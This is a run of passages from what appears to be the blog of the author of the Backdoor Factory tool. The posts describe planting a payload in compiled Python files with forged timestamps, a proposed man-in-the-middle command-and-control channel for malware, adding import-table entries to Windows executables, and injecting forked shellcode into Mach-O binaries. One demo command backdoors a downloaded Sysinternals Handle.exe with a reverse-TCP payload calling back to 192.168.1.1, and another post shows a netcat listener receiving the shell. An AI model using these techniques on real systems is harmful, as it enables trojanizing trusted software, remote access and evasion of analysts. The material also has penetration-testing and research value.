<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimGm944EzwgZJPOUXV0ryiutIlw6z0oYcSy024B9NdZebe6bzYDUA-vTleVBs3xa8GyBzWrMb8XiVjSZoNT1MPixNhXxppdwRb8-hwgUJ69kkW36Y7kINxFo4ZzZ0N1bBwA16Ei4PLNeo/s1600/payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimGm944EzwgZJPOUXV0ryiutIlw6z0oYcSy024B9NdZebe6bzYDUA-vTleVBs3xa8GyBzWrMb8XiVjSZoNT1MPixNhXxppdwRb8-hwgUJ69kkW36Y7kINxFo4ZzZ0N1bBwA16Ei4PLNeo/s640/payload.png" width="640" /></a><br />
<br />
First, the parent file is copied to /tmp/ and the POC is appended to the end of the py file. Then it is py_compiled to pyc. Next the timestamp and size (if 3.X) is modified to match the parent file. Finally the pyc file is copied to the original location under the parent file, or in __pycache__ in python3.X.<br />
<br />
Cheers.<br />
<a href="https://github.com/secretsquirrel/backdoor-pyc">Code</a>midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com3tag:blogger.com,1999:blog-1658879437550643598.post-45676923148686816512015-03-23T05:25:00.000-07:002015-03-23T05:25:14.446-07:00Yet Another Reason for HTTPS Everywhere: Internet Node Based Malware Command and Control Channels<div>
“The source of every crime, is some defect of the understanding; or some error in reasoning; or some sudden force of the passions. Defect in the understanding is ignorance; in reasoning, erroneous opinion.” </div>
<div>
― Thomas Hobbes, Leviathan</div>
<h3>
</h3>
<div>
<br /></div>
<h3>
Introduction</h3>
<div>
<br /></div>
<div>
As most of us know, many of the web sites and services we depend on the Internet are unencrypted, including news, retail, sports, and entertainment. Each one of these sites and services unintentionally provide an avenue for a MitM command and control (C2) infrastructure. In this concept, it is the <b>traffic route</b> that is important and that it can be <b>modified</b>. Sites could be selected based on the crossing of C2 nodes along geographic lines or routing choke points, which could also help with locating the general area of infected machines. In addition, these sites would be normal in terms of user traffic and would not stand out from an initial DNS based forensic inquiry.</div>
<h3>
</h3>
<div>
<br /></div>
<h3>
The Concept</h3>
<div>
<br /></div>
<div>
Disclaimer: I have no proof this idea is in use as stated in this post. This is just a proposal of an idea.</div>
<div>
<br /></div>
<div>
A MitM malware Command and Control (C2) channel needs three things to exist:</div>
<div>
1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Malware on an infected machine</div>
<div>
2.<span class="Apple-tab-span" style="white-space: pre;"> </span>That contacts servers via unencrypted or <a href="http://www.forbes.com/sites/thomasbrewster/2015/02/19/superfish-need-to-know/">decrypt-able</a> traffic</div>
<div>
3.<span class="Apple-tab-span" style="white-space: pre;"> </span>Which crosses a malicious node that could inspect and inject content into the traffic</div>
<div>
<br /></div>
<div>
Normal Traffic:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja4PFbQMJvXX_Ov1gRtuJ4ESz61v63NfRFV8fa_JKIhg9yGpmUmZvXnjObZUFIYBu66sUA0LcDmsXLtSzjOqv8epnN1uS2umfV0VGrKLqwYg8nh-RIbw4wc0nbh7QkmECtY4Ps_IeBT7I/s1600/normalTraffic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja4PFbQMJvXX_Ov1gRtuJ4ESz61v63NfRFV8fa_JKIhg9yGpmUmZvXnjObZUFIYBu66sUA0LcDmsXLtSzjOqv8epnN1uS2umfV0VGrKLqwYg8nh-RIbw4wc0nbh7QkmECtY4Ps_IeBT7I/s1600/normalTraffic.png" height="296" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Malware Communicating with a Malicious Node:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwDHH3n0PzsjqKi-vTFMiOU1pL1X319IwWvTHoczJZhvydHP7j2gC_19l23jw-1RsOaS2YW7hfefhbJB15W53bR46scKWTw8ggROJTLtt7Og9rqkyl-hIhW9lIuxFNFiaKbDwUtAZsd2s/s1600/mitmMalwareC2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwDHH3n0PzsjqKi-vTFMiOU1pL1X319IwWvTHoczJZhvydHP7j2gC_19l23jw-1RsOaS2YW7hfefhbJB15W53bR46scKWTw8ggROJTLtt7Og9rqkyl-hIhW9lIuxFNFiaKbDwUtAZsd2s/s1600/mitmMalwareC2.png" height="432" width="640" /></a></div>
<div>
</div>
<div>
<br /></div>
<div>
The MitM malware C2 concept is incredibly simple, but generally difficult to implement, and would be even more difficult to find in use. For a realistic attack, an adversary would need to implement the C2 code within an already existing infrastructure, particularly at advantageous nodes on the Internet. To solve this problem, let’s consider that a node being used for mass Internet surveillance is multipurpose. Besides traffic capture, the most obvious use is the modification of traffic to stop the flow of information that opposes the view of the political powers that <a href="http://en.wikipedia.org/wiki/Golden_Shield_Project">be</a> or for <a href="http://www.nytimes.com/2015/01/26/technology/verizons-mobile-supercookies-seen-as-threat-to-privacy.html?_r=0">corporate</a> <a href="http://blog.squarelemon.com/blog/2015/03/18/mitm-in-telecoms-networks-i-told-you-so-dot-dot-dot-sort-of/">interests</a>. Next is the MitM modification of <a href="https://www.leviathansecurity.com/blog/the-case-of-the-modified-binaries/">binaries</a> and code during download. Intelligence leaks have presented systems in place that could <a href="https://www.schneier.com/blog/archives/2013/10/how_the_nsa_att.html">re-route</a> client traffic to a server for end point exploitation. Finally I propose the possible implementation of a MitM malware C2 channel.</div>
<div>
<br /></div>
<div>
For an example, let us consider using HTTP for the channel.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTLX0oYB8rxbwysTrogZnGpVFCW8TxtOEDUgRNA1KzXz3O1t1Vqb8Id_-Hk_Vd40T7T_caVKfUJtwMQpm93ZaFMN8Woe1-iHrFIanqSvH0B7rcRrYeKkBemiKSfxK6cWuqVwpKXlkkiRU/s1600/httpExample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTLX0oYB8rxbwysTrogZnGpVFCW8TxtOEDUgRNA1KzXz3O1t1Vqb8Id_-Hk_Vd40T7T_caVKfUJtwMQpm93ZaFMN8Woe1-iHrFIanqSvH0B7rcRrYeKkBemiKSfxK6cWuqVwpKXlkkiRU/s1600/httpExample.png" height="215" width="640" /></a></div>
<div>
</div>
<div>
<br /></div>
<div>
The above diagram starts with an infected machine with malware (1) that is built to communicate via this infrastructure using HTTP GET requests. The malware can be designed to communicate directly out, spoofing its User-Agent during the request. Perhaps the malware works like <a href="http://www.forbes.com/sites/thomasbrewster/2015/02/19/superfish-need-to-know/">Superfish</a> or <a href="https://threatpost.com/privdog-poses-bigger-risk-than-superfish/111211">Privdog</a> breaking secure communications. Or it could be designed to parse outbound traffic and modify or tag the HTTP <a href="https://labs.snort.org/papers/ua-analysis.html">User-Agent</a> header to a slightly different string making it identifiable from other HTTP requests on the web. Furthermore, this malware will add an additional header; name doesn’t matter as the <a href="http://tools.ietf.org/html/bcp178">specifications</a> allow flexibility, which will be used to pass encrypted data that is also base64 encoded. </div>
<div>
<br /></div>
<div>
Next the HTTP request traverses the Internet from routing node to routing node as it makes it way to the requested HTTP server. Along this path, a (2) Malicious/Evil Node inspects traffic for the unique User-Agent used by the malware. When the unique User-Agent request passes through this node, the C2 implementation tracks it, decrypts the encrypted message (if there), and waits for the response from the server. One idea is that it again slightly modifies the User-Agent to avoid another malicious nodes in the route from modifying the request. The modification could be as simple as removing the known tag from the User-Agent string.</div>
<div>
<br /></div>
<div>
The HTTP server (3) receives and (4) responds to the HTTP GET request.</div>
<div>
<br /></div>
<div>
The server’s HTTP response traverses back to the originating request (5) crossing the malicious node once again. As the response is handled, the malicious node injects a command for the malware into the either the HTML content as a comment with a unique tag or as an added unique HTTP response header that uses the same encryption scheme as the malware.</div>
<div>
<br /></div>
<div>
Finally the (6) HTTP response makes it way back to the originating machine, the malware either handles the request directly or intercepts the request, parses the request for encrypted commands, scrubs the request modifications in memory, then presents the response back to the user. Depending on the command, the malware will wait (sleep) until the next predetermined beaconing (1) attempt to contact the MitM C2 Node with the results of the prior command, if necessary.</div>
<div>
<br /></div>
<div>
I’ve written a POC to test portions of my thoughts; the client and server are written in python, with the C2 using mitmProxy. After contemplation, I am not releasing the POC. I believe it would <b>not</b> be useful to the pentester outside of an attacker controlled wireless access point and otherwise difficult to implement. If I get enough feedback wanting a robust implementation, perhaps I'll build something.</div>
<h3>
</h3>
<div>
<br /></div>
<h3>
Anti-Forensics</h3>
<div>
<br /></div>
<div>
Many malware analysts work in a vacuum. Because of OPSEC, they cannot share their samples and indicators of compromise (IOCs) openly on the Internet. This balkanization of knowledge is not equipped to find a MitM malware C2 infrastructure. To the malware analyst, the contacted web server will appear to be the source of commands, especially for sites that are not popular (Ex: http://www.millerscleaners.com/). The analyst will write the site up as the C2, finish the network forensics part of the investigation, and continue on to other tasks. The true C2 will go undetected; the patsy site will be determined as compromised, blocked within that organization, and at worse shared with a closed-source threat intelligence group.</div>
<div>
<br /></div>
<div>
Determining if the web server is compromised in this scenario will depend on the implementation of the malware. In contrast to the prior example, if the malware uses multiple HTTP servers, especially popular sites, the analyst might determine that not all sites are compromised. At this point, the analyst could take the risk of checking out of bounds via Tor network or a VPN service. This would be a calculated risk as Malware authors of traditional end point C2s could have their servers configured to recognize requests from Tor exit nodes or outside of their target networks, thereby alerting that their malware samples have been found.</div>
<div>
<br /></div>
<div>
The other way to catch this type of threat is to monitor the change in server responses from node to node to determine when the C2 injects traffic - currently an impossible task. To stop this potential threat we need HTTPS everywhere and strong host security that is not undermined by vendor implementations. </div>
<h3>
</h3>
<div>
<br /></div>
<h3>
In Conclusion</h3>
<div>
<br /></div>
<div>
I encourage malware analysts to look at malware C2 implementations differently and consider this as a potential avenue, albeit improbable. For companies with massive amounts of historical malware C2 data, it would be interesting exercise to determine which malware samples and classes could fall into this type of C2.</div>
<div>
<br /></div>
midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com0tag:blogger.com,1999:blog-1658879437550643598.post-40512081176292204672015-02-18T13:30:00.002-08:002015-02-19T11:23:43.238-08:00New BDF Feature: Import Table 'Patching'The PE file Import Table - what does it do?<br />
<br />
It is what makes a windows binary a portable executable.<br />
<br />
Think of it as a reference table for all the Windows APIs (or custom apis) that will be called by the binary. It's created at compile time.<br />
<br />
Within the Import Table there are thunks, these are populated with winAPI addresses at load time. This is advantageous because with ASLR you cannot have static API addresses programmed into the thunks and the binary would not be portable because of API address differences between windows operating systems. <br />
<br />
These APIs are pointed to by an Import Directory Table with an entry for each imported API. Within this structure there are pointers to the API thunk, the thunk is populated with an address at load time in memory. When the binary was compiled, each program call to each thunk was statically set - e.g. position dependent. The relative virtual address (RVA) from module entry in memory of these thunks do not change between execution, it's always the same RVA offset for that particular binary until it is recompiled, statically modified, or redirected in memory via hooking.<br />
<br />
BDF began by using Metasploit windows shellcode for payloads. It worked. Stephen Fewer's hash lookup api is great, it is position independent, and great for exploitation. While AV evasion wasn't perfect, code cave jumping helped with that issue. However, EMET blocks Metasploit payloads because of the way Stephen Fewer's hash lookup api works, using the Kernel32.dll EAT to find LoadLibrary/GetProcAddress and then the API address to be called (or rather via jmp instruction). As such I wanted to move away from the hash lookup api to using the Import Table directly. Because the <a href="https://github.com/secretsquirrel/the-backdoor-factory">Backdoor Factory</a> (BDF) is statically patching binaries and compiled binaries use position dependent code, so should BDF. BDF could use the APIs already in the Import Table to build a payload - LoadLibraryA and GetProcAddress is all you need. Most binaries have these two APIs. However, not all of them.<br />
<br />
Enter IAT 'patching'.<br />
<br />
I call it 'patching', but rather it is redirection and addition of new APIs.<br />
<br />
Adding imports to an existing IAT would be ludicrous and somewhat painful. I do want to attempt this at some point when I have time and an appetite for self destruction. TL;DR One would need to add an API in the middle of the Import Table, changing the following API offsets and size for the section, potentially changing offsets for entire sections afterwards, and other yet unknown potential offsets.<br />
<br />
So what did I do?<br />
<br />
1. Copy the Import Directory Table into a new PE section appended on the end of the binary.<br />
2. Change the Import Table pointer in the Optional Header to the new Import Directory Table in the new section.<br />
3. Instead of ending the Import Directory Table with a null byte entry, build a new Import Table (of sorts) right onto the end of it, following standard convention (<a href="http://sandsprite.com/CodeStuff/Understanding_imports.html">http://sandsprite.com/CodeStuff/Understanding_imports.html</a>, h<a href="ttps://msdn.microsoft.com/en-us/library/windows/desktop/ms680547(v=vs.85).aspx">ttps://msdn.microsoft.com/en-us/library/windows/desktop/ms680547(v=vs.85).aspx</a>).<br />
<br />
And that's it.<br />
<br />
BDF windows payloads that have 'iat' in the name will look for APIs in the Import Table first, then if missing, will automatically add those missing APIs into the new Import Table in the new section. I just <a href="https://github.com/secretsquirrel/the-backdoor-factory/commit/a7ff507f504ba4b8997432ce37700f9397ce15d5">added</a> a new payload that uses the Import Table for x64 PE files, iat_reverse_tcp, same concept as the x86 version added back in May 2014. I'm making the move to get away from from Metasploit payloads, but I still what to use meterpreter and other payloads that pentesters are used too. Stay tuned.<br />
<br />
Right now these payloads use LoadLibraryA/GetProcAddress to load a payload.<br />
<br />
In the future, I will get away from these two APIs and use the actual APIs needed for each payload since I can add them in a new Import Table if they do not exist in the original Import Table.<br />
<br />
Other uses? Using this technique I could rebuild an Import Table or recreate one from API calls in memory. From malware perhaps or packed executables - I don't know.<br />
<br />
If you can think of any other uses for Import Table rebuilding contact me on twitter: @midnite_runr<br />
<br />
Simple Demo:<br />
$ wget http://live.sysinternals.com/Handle.exe<br />
<br />
$ ./backdoor.py -f Handle.exe -s iat_reverse_tcp -P 8080 -H 192.168.1.1 -q<br />
[*] In the backdoor module<br />
[*] Checking if binary is supported<br />
[*] Gathering file info<br />
[*] Reading win32 entry instructions<br />
[*] Loading PE in pefile<br />
[*] Parsing data directories <br />
[*] Adding New Section for updated Import Table<br />
[!] Adding LoadLibraryA Thunk in new IAT #<-- import table creation<br />
[*] Gathering file info #<-- updating PE info<br />
[*] Checking updated IAT for thunks #<-- checking for success<br />
[*] Loading PE in pefile<br />
[*] Parsing data directories<br />
[*] Looking for and setting selected shellcode<br />
[*] Creating win32 resume execution stub<br />
[*] Looking for caves that will fit the minimum shellcode length of 382<br />
[*] All caves lengths: (382,)<br />
<br />midnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com0tag:blogger.com,1999:blog-1658879437550643598.post-9833275980326935152014-08-18T10:55:00.001-07:002015-01-28T19:53:26.240-08:00Patching the Mach-o Format the Simple and Easy WayThis is a strange post for me.<br />
<br />
I'm relatively new to mac research. So when I find something new, that seems cutting edge, but relatively simple I question it. Has anyone else done this before? Is this in the public domain? Is this in the academic domain that I have no way of researching?<br />
<br />
I google like hell.<br />
<br />
I question myself (for a short period of time).<br />
<br />
I write my congressman.<br />
<br />
I wait.<br />
<br />
I try to contact people in the know without letting them know to much.<br />
<br />
Then I'm afraid I've said too much.<br />
<br />
So here we are.<br />
<br />
Thank's to the guys in #osxre (fg!) for telling what would work and not work.<br />
<br />
This is my 'new' method for patching the mach-o format. <br />
<br />
The macho format is simply nested segments in a very straight forward waterfall format that IMHO is much more simple than the PE and ELF formats.<br />
<br />
As you have seen many times, this is the format, no seriously, this is it:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiay7mrWb83vdvCWUMNPo2cU6o_3_Z3ASyma8V-c3_ZpGZio0XqaHcvOvGRejkuLevhzab61AGpY8AzPMwL9jeXUf41ZTHgpxguTUPokTn0OVUylxT5dnW5NZAMm3y5FvNHzudrcjPxjgE/s1600/mach_o_format.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiay7mrWb83vdvCWUMNPo2cU6o_3_Z3ASyma8V-c3_ZpGZio0XqaHcvOvGRejkuLevhzab61AGpY8AzPMwL9jeXUf41ZTHgpxguTUPokTn0OVUylxT5dnW5NZAMm3y5FvNHzudrcjPxjgE/s1600/mach_o_format.png" /></a></div>
<br />
From: <a href="https://developer.apple.com/library/mac/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html">https://developer.apple.com/library/mac/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html</a><br />
<br />
What is so special about this format?<br />
<br />
It is very <strike>hackable </strike>easy to modify, far easier than ELF and PE formats.<br />
<br />
There are not many code caves in a mach-o executable:<br />
$ file ls.mach-o<br />
ls.mach-o: Mach-O 64-bit executable x86_64<br />
<br />
$ python ./find_caves.py ls.mach-o<br />
[*] Looking in ls.mach-o for caves<br />
[*] Looking for caves of 50 byes in size<br />
No section<br />
->Begin Cave 0x736<br />
->End of Cave 0x10f8 # <--- Remember this one<br />
Size of Cave (int) 2498<br />
**************************************************<br />
No section<br />
->Begin Cave 0x4ff6<br />
->End of Cave 0x5038<br />
Size of Cave (int) 66<br />
**************************************************<br />
No section<br />
->Begin Cave 0x54d1<br />
->End of Cave 0x6000<br />
Size of Cave (int) 2863<br />
**************************************************<br />
[*] Total of 3 caves found<br />
<br />
The caves are large, but they are not in a section that includes read/execute attributes.<br />
<br />
But let's look at the beginning of the __TEXT/_text segment/section:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjswPX3GejWGrKe7DV7hWhxEnpzqQZ024FdXcWjo7vQ-Nl4swXE-74UOPSdCbNQhjt-cENaCp_hklLgAvg7fCCfUgcXiBsp5BeBUQgGiNwOOKV6n7aZb3gT6U2y-euZUsvOVz7Oqa9Dy0k/s1600/_text_before.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjswPX3GejWGrKe7DV7hWhxEnpzqQZ024FdXcWjo7vQ-Nl4swXE-74UOPSdCbNQhjt-cENaCp_hklLgAvg7fCCfUgcXiBsp5BeBUQgGiNwOOKV6n7aZb3gT6U2y-euZUsvOVz7Oqa9Dy0k/s1600/_text_before.png" height="155" width="400" /></a></div>
<br />
<br />
Let's look at lower address space, what's going on?<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr-J8FoHJ4SETM7KlELzZLlQpn6Fc9_2a7B_0ItI66IHRPVGOgIHTewhZsRvKAIPGgXvOX37fw7_srRd3eAS2D8gmusHazwFRKC3Uc-hYKji-erg2lDln7IpDaqnHjeIWQcGYoh_CTEIs/s1600/_text_before_z.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgr-J8FoHJ4SETM7KlELzZLlQpn6Fc9_2a7B_0ItI66IHRPVGOgIHTewhZsRvKAIPGgXvOX37fw7_srRd3eAS2D8gmusHazwFRKC3Uc-hYKji-erg2lDln7IpDaqnHjeIWQcGYoh_CTEIs/s1600/_text_before_z.png" height="32" width="400" /></a></div>
<br />
<br />
Continuing:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3MipD68QqF-UPPlNeQwuB2I2Is34F0cqXHAgl1SWsjQ_4sQgHYdbno09up0WePUYHD8QS1FwQhO-w_2N7xB7AKqDDX4RB3RBXgBACAhXoGvG0MyVfd14b7Z5BLKF_gLj-pkpkrIfp5Fo/s1600/_text_before_mz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3MipD68QqF-UPPlNeQwuB2I2Is34F0cqXHAgl1SWsjQ_4sQgHYdbno09up0WePUYHD8QS1FwQhO-w_2N7xB7AKqDDX4RB3RBXgBACAhXoGvG0MyVfd14b7Z5BLKF_gLj-pkpkrIfp5Fo/s1600/_text_before_mz.png" height="112" width="400" /></a></div>
<br />
Continuing:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLbkcnfM86aPgJy_Rg1EQQXaTpXE3hmv6LvwrUWkFoACPiF-sLTqrXW8S7gWIMF8kHVtXuoPzWIutm8tGefF1aWKvZ-FsxpgE1hVDYavwqMYE_5eCgkBomfXxNE-OeLL4asJdsvLWtylA/s1600/_text_before_mzz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLbkcnfM86aPgJy_Rg1EQQXaTpXE3hmv6LvwrUWkFoACPiF-sLTqrXW8S7gWIMF8kHVtXuoPzWIutm8tGefF1aWKvZ-FsxpgE1hVDYavwqMYE_5eCgkBomfXxNE-OeLL4asJdsvLWtylA/s1600/_text_before_mzz.png" height="400" width="345" /></a></div>
<br />
<br />
You get the idea. Many zeros. Much waste. Wow.<br />
<b><br /></b>
<b>But that looks like enough room for shellcode, right? (The answer is yes).</b><br />
<br />
How do we make that part of the __TEXT,__text segment/section?<br />
<br />
Easy:<br />
<br />
1. Change the __text section Address and Offset to the beginning of your shellcode and Size to accommodate your new shellcode.<br />
<br />
<b>Update 1/28/2014: </b>This step is not necessary. Greetz to fG!: <a href="https://reverse.put.as/2012/02/02/anti-disassembly-obfuscation-1-apple-doesnt-follow-their-own-mach-o-specifications/">https://reverse.put.as/2012/02/02/anti-disassembly-obfuscation-1-apple-doesnt-follow-their-own-mach-o-specifications/</a><br />
<br />
Before:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvtBOCCJ9l54feaIt6s4NBFsF2t7Azpi23aGOMgYtBwTsdgWCRiTPZNzYUei2Fo9LDl6dGOnjG65FHWvz14NUeXZIdq7PV8gMNXahPuxcBphS9J1Y1bs5T5aaz2XMMKiQEhxYlv9Rlkw/s1600/_text_section_before.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvtBOCCJ9l54feaIt6s4NBFsF2t7Azpi23aGOMgYtBwTsdgWCRiTPZNzYUei2Fo9LDl6dGOnjG65FHWvz14NUeXZIdq7PV8gMNXahPuxcBphS9J1Y1bs5T5aaz2XMMKiQEhxYlv9Rlkw/s1600/_text_section_before.png" height="297" width="640" /></a></div>
<br />
After:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjygwg_mCg310y8QngUqEcKopvXFmEYpuoxsW9rlTIDxLtqfWUGGg3JaJG92TIvmTZi08V5eUq7IFUsZQNrK0MOZPS8cZ8sL06BGfShLRgI8s_o1tTpd969zuAVnUDhqoxe_7K7mmLc87Q/s1600/_text_section_after.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjygwg_mCg310y8QngUqEcKopvXFmEYpuoxsW9rlTIDxLtqfWUGGg3JaJG92TIvmTZi08V5eUq7IFUsZQNrK0MOZPS8cZ8sL06BGfShLRgI8s_o1tTpd969zuAVnUDhqoxe_7K7mmLc87Q/s1600/_text_section_after.png" height="300" width="640" /></a></div>
<br />
<br />
2. Change LC_Main to point to the __text Offset or if a LC_UNIXTHREAD binary make sure [eip|rip] points to the new __text Address.<br />
<br />
Before:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUmtUix_5qltu17vf9lzSQxyLBC6zIv302ITjCW95ks8PfD9_FCfBnhKp-oaKkwzjyEeLfZ72JR6vz5sN5Vdg36vhWX_ZRtXwwIYm8MW0uzX18BWJ8a08sEx2KEEagTaLpZCxtT4fQPFk/s1600/LC_MAIN_before.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUmtUix_5qltu17vf9lzSQxyLBC6zIv302ITjCW95ks8PfD9_FCfBnhKp-oaKkwzjyEeLfZ72JR6vz5sN5Vdg36vhWX_ZRtXwwIYm8MW0uzX18BWJ8a08sEx2KEEagTaLpZCxtT4fQPFk/s1600/LC_MAIN_before.png" height="302" width="640" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
After:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXz-4ViyoG-nYVRTlbWLWP3XoLBqZQOxrR0F8gPFeh4UR9fdUQqDMP9H12BFjaaMR37VpUcLwBIN_bjT17tfYrIrcnOoDHRGY6IpqFYcVxRRHszlvZF-buHug-QXR_RAYzQ3h5xH4qqYA/s1600/LC_MAIN_after.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXz-4ViyoG-nYVRTlbWLWP3XoLBqZQOxrR0F8gPFeh4UR9fdUQqDMP9H12BFjaaMR37VpUcLwBIN_bjT17tfYrIrcnOoDHRGY6IpqFYcVxRRHszlvZF-buHug-QXR_RAYzQ3h5xH4qqYA/s1600/LC_MAIN_after.png" height="301" width="640" /></a><br />
<br />
<br />
3. You need to fork() your shellcode so that it continues after the parent has completed and you need to make sure that what LC_MAIN/LC_UNIXTHREAD was pointing to originally is the first thing that is executed whether a dyld or the __text section. Here I have the shellcode that I use in my POC.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbweug7b6J8im_ET9nKmW2XpamQgpp877IYIkDWFDUldamozwLdDbn6DNxIHiH_vg6LA-gchAEbMd5XxulCKShz6_uy0NMdkIxyX7xt5gY-ZJQFvRmJrn3Na5CleuClM_WwxO7ouMn0kw/s1600/shellcode_fork.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbweug7b6J8im_ET9nKmW2XpamQgpp877IYIkDWFDUldamozwLdDbn6DNxIHiH_vg6LA-gchAEbMd5XxulCKShz6_uy0NMdkIxyX7xt5gY-ZJQFvRmJrn3Na5CleuClM_WwxO7ouMn0kw/s1600/shellcode_fork.png" height="240" width="640" /></a></div>
<br />
<br />
And that's it. No really. That's it.<br />
<br />
Here's the beginning of the __TEXT Segment after:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh81JlYhsY70F4SV75RXSUc8IgkEua_or2KMayUwR1f4Y4gCt1Nva0IiGr0PhwwHFQ-uXimTAhGg99WEmle-LKQOFAxTCg2NCg5kJDed1P6yymnc4wa5jqv7r5ctx9KhxRF93lWeJkJ8Ro/s1600/after_patching_text.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh81JlYhsY70F4SV75RXSUc8IgkEua_or2KMayUwR1f4Y4gCt1Nva0IiGr0PhwwHFQ-uXimTAhGg99WEmle-LKQOFAxTCg2NCg5kJDed1P6yymnc4wa5jqv7r5ctx9KhxRF93lWeJkJ8Ro/s1600/after_patching_text.png" height="367" width="400" /></a></div>
<br />
<br />
As you may have already figured out, this method works on both LC_MAIN and LC_UNIXTHREAD binaries. Also, this will work from within Fat binaries.<br />
<br />
Proof:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfykE01KO7hQTr7FhYVIhts2LS2IUINdgRNu6wP1fEeG8emZ6mOUXeURAXWwBw_fFHsrSaZA7oQ9V7ssjYQz4Wqt88BgxbWXLVaWTrcwoBn_pU8JnQdYPscFreXQT1judBE5644OoPLc4/s1600/proof.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfykE01KO7hQTr7FhYVIhts2LS2IUINdgRNu6wP1fEeG8emZ6mOUXeURAXWwBw_fFHsrSaZA7oQ9V7ssjYQz4Wqt88BgxbWXLVaWTrcwoBn_pU8JnQdYPscFreXQT1judBE5644OoPLc4/s1600/proof.png" height="640" width="566" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Top window: netcat listener<br />
Bottom window: Executing the patched ls.macho showing all the other successfully patched bins with my POC.</td></tr>
</tbody></table>
<br />
I've already automated the i386/x64 intel chipset mach-o patching, expect an update in BDF supporting these chipsets and Fat binaries containing these mach-o formats.<br />
<br />
Cheers,<br />
Midnite_runrmidnite_runrhttp://www.blogger.com/profile/14122685015764808622noreply@blogger.com0tag:blogger.com,1999:blog-1658879437550643598.post-37799187975763590302014-04-07T06:17:00.000-07:002014-04-07T06:17:16.796-07:00Why The BackdoorFactoryYes. I've questioned myself on the name: Backdoor Factory. Early on in it's release, the Google search for my own tool comes up with some interesting results. I don't have the courage to click the "Willy Wonka and the Backdoor Factory" link that ends up in the results: <br />
